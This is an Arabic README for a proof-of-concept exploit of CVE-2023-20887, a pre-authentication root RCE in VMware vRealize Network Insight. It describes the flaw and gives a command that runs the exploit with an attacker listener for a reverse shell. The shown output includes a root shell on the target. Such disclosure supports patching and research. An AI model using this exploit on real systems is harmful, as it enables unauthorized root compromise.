
VMWare vRealize Network Insight ثغرة تنفيذ كود عن بُعد قبل المصادقة (CVE-2023-20887)
POC لثغرة CVE-2023-20887 في VMWare Aria Operations for Networks (vRealize Network Insight) — تنفيذ أوامر عن بُعد (RCE) دون مصادقة
يمكن العثور على تحليل السبب الجذري للثغرة على مدونتي: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

VMWare Aria Operations for Networks (vRealize Network Insight) معرّضة لحقن الأوامر عند قبول مدخلات المستخدم عبر واجهة Apache Thrift RPC. تتيح هذه الثغرة لمهاجم عن بُعد غير مصادَق تنفيذ أوامر عشوائية على نظام التشغيل الأساسي بصلاحيات المستخدم root. واجهة RPC محمية بوكيل عكسي (reverse proxy) يمكن تجاوزه. قيّمت VMware خطورة هذه المشكلة ضمن نطاق حرج (Critical) بأعلى درجة أساسية في CVSSv3 تبلغ 9.8. يمكن لفاعل خبيث الحصول على تنفيذ أكواد عن بُعد في سياق صلاحيات 'root' على الجهاز. إصدارات VMWare 6.x معرّضة للثغرة.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
قم بالتحديث إلى أحدث إصدار أو خفّف المخاطر باتباع الإرشادات الواردة في Progress Advisory
أُنشئ هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس الغرض منه استخدامه لمهاجمة الأنظمة إلا في الحالات المصرّح بها صراحةً. القائمون على المشروع غير مسؤولين عن أي إساءة استخدام للبرنامج. استخدمه بمسؤولية.